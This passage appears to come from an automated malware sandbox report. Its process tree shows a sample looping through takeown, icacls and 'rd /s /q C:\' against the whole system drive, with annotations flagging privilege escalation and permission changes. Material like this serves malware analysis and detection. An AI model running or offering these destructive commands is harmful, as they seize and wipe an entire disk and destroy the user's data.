    3⤵
    PID:2556
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:1868
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:3712
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:3668
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:4228
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:1136
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5056
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    - Drops file in Program Files directory
    PID:5316
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5328
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5616
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5760
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5816
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:5840
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5928
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6056
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5600
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:5652
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6004
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:4408
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5472
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:6084
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5344
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:5824
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:5588
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5912
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5948
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5200
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5136
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:5340
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6068
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3848
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5224
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3636
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:5840
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5196
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5724
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6172
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6180
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6292
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6428
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:6436
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6576
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6664
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:6680
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6800
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6956
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6976
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:7084
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6200
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5560
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6372
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6780
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6884
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6868
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6992
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6244
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6368
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:6656
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6976
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6284
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6300
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6688
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7156
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6992
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6616
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7088
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:6268
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6832
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6856
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7128
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7184
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7332
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:7348
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7448
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7544
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7552
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7676
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7748
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:7764
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7904
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7988
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8004
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8140
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7180
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6908
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7324
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7496
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7480
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7724
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7972
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7928
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8112
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:6996
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:8164
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7300
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7564
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7596
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:7324
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8000
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7176
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7444
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:7292
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7724
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8056
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7428
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:7524
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8088
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7868
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7712
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7856
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7948
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:6800
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:7760
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:6832
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8276
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8376
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8396
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:8492
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8612
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8620
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8764
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8864
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8872
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9004
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9100
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9112
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7500
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8324
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8392
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:8544
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8608
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8588
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8856
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9056
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9052
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8228
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8280
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8404
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8648
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8964
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8812
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7964
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8332
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8372
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8848
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8852
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8996
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9128
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8232
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7500
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9040
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8792
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:9128
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8788
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:8932
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9256
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9392
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:9416
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9556
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9700
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:9708
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9824
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9940
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:9960
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10076
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10220
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10236
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9040
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9564
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9536
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9712
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9416
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:8404
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10064
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10184
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9236
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10236
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9576
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9596
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9672
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10044
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9108
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9684
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9500
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10096
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9240
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10212
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10100
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9960
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:436
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:9792
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:10328
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10436
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10452
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10592
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10688
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10696
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10848
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10928
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10936
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11080
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11184
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11192
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:10064
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10380
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10360
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10528
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10776
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10948
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11048
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11168
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10312
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10416
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:10820
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10708
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:10964
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:10960
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
